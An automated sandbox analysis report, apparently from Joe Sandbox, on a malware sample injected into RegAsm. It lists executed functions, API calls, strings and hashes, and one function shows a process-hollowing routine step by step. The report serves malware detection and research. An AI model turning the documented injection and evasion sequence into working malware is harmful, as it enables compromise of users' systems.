10003a82 55773->55780 55775 10003b0b 55776 10003b24 TlsAlloc 55775->55776 55777 100038f2 55775->55777 55777->55771 55778 10003ba2 5 API calls try_get_function 55777->55778 55778->55768 55779->55771 55781 10003aaa 55780->55781 55783 10003aa6 __crt_fast_encode_pointer 55780->55783 55781->55783 55784 100039be 55781->55784 55783->55775 55786 100039cd try_get_first_available_module 55784->55786 55785 10003a77 55785->55783 55786->55785 55787 100039ea LoadLibraryExW 55786->55787 55789 10003a60 FreeLibrary 55786->55789 55790 10003a38 LoadLibraryExW 55786->55790 55787->55786 55788 10003a05 GetLastError 55787->55788 55788->55786 55789->55786 55790->55786 55792 10007470 55791->55792 55793 10002ada _ValidateLocalCookies 5 API calls 55792->55793 55794 100024a3 55793->55794 55794->55741 55794->55762 55795 10005bff 55803 10005d5c 55795->55803 55798 10005c13 55800 10005c1b 55801 10005c28 55800->55801 55811 10005c2b 10 API calls 55800->55811 55804 10005c45 _abort 4 API calls 55803->55804 55805 10005d83 55804->55805 55806 10005d9b TlsAlloc 55805->55806 55807 10005d8c 55805->55807 55806->55807 55808 10002ada _ValidateLocalCookies 5 API calls 55807->55808 55809 10005c09 55808->55809 55809->55798 55810 10005b7a 19 API calls 2 library calls 55809->55810 55810->55800 55811->55798

                                                                        Executed Functions

                                                                        Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                        • API String ID: 4236061018-3687161714
                                                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                                        Function 004180EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 484 4183f6-418413 WriteProcessMemory 480->484 485 418419-418430 SetThreadContext 480->485 481->480 483 4183da-4183ed call 418503 481->483 491 4183bc-4183c3 482->491 483->480 484->465 488 418415 484->488 485->465 489 418432-41843e ResumeThread 485->489 488->485 489->465 493 418440-418442 489->493 491->478 493->453
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                                        • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                                                                        • NtClose.NTDLL(?), ref: 004182F7
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                                        • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                                        • ResumeThread.KERNEL32(?), ref: 00418435
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                                        • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                                        • NtClose.NTDLL(?), ref: 00418468
                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                                        • GetLastError.KERNEL32 ref: 0041847A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                        • API String ID: 316982871-3035715614
                                                                        • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                        • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                                        • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                                        • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                                                        Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1580 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1587 10001177-1000119e lstrlenW FindFirstFileW 1580->1587 1588 10001168-10001172 lstrlenW 1580->1588 1589 100011a0-100011a8 1587->1589 1590 100011e1-100011e9 1587->1590 1588->1587 1591 100011c7-100011d8 FindNextFileW 1589->1591 1592 100011aa-100011c4 call 10001000 1589->1592 1591->1589 1594 100011da-100011db FindClose 1591->1594 1592->1591 1594->1590
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                        • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                        • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                        • String ID:
                                                                        • API String ID: 1083526818-0
                                                                        • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                        • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                        • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                        • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                        Function 0040F7A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                          • Part of subcall function 00413549: RegQueryValueExA.KERNEL32 ref: 00413587
                                                                          • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                        • String ID: 5.0.0 Pro$`2U$override$pth_unenc
                                                                        • API String ID: 2281282204-970319588
                                                                        • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                        • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                        Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                                                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                                                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                                                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                        • String ID:
                                                                        • API String ID: 3950776272-0
                                                                        • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                                                        • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                                                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                                                        Function 0041B60D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,@5U), ref: 0041B62A
                                                                        • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Name$ComputerUser
                                                                        • String ID: @5U
                                                                        • API String ID: 4229901323-921383711
                                                                        • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                        • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                                                        • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                                                        • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                                                        Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00559630), ref: 00433849
                                                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                        • String ID:
                                                                        • API String ID: 1815803762-0
                                                                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                        Function 00448957 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                                                        Strings
                                                                        • GetSystemTimePreciseAsFileTime, xrefs: 00448972
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Time$FileSystem
                                                                        • String ID: GetSystemTimePreciseAsFileTime
                                                                        • API String ID: 2086374402-595813830
                                                                        • Opcode ID: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                        • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                                                        • Opcode Fuzzy Hash: ec0f4eb119bfc3d52cbbcb4ffab675a518ff64a6f359a61470016f4626938150
                                                                        • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                                                        Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                        • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                                        • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 0040E9C5 Relevance: 63.8, APIs: 15, Strings: 21, Instructions: 795COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 104 40ec33-40ec37 94->104 105 40ec2c-40ec2e 94->105 99->79 126 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 100->126 108 40ec76-40ec89 call 401e65 call 401fab 104->108 109 40ec39 call 407716 104->109 105->104 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 117 40ec3e-40ec40 109->117 120 40ec42-40ec47 call 407738 call 407260 117->120 121 40ec4c-40ec5f call 401e65 call 401fab 117->121 120->121 121->108 141 40ec61-40ec67 121->141 156 40f3a5-40f3af call 40dd42 call 414f2a 126->156 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 203 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->203 234 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->234 183 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->183 184 40ee0f-40ee19 call 409057 180->184 193 40ee1e-40ee42 call 40247c call 434798 183->193 184->193 211 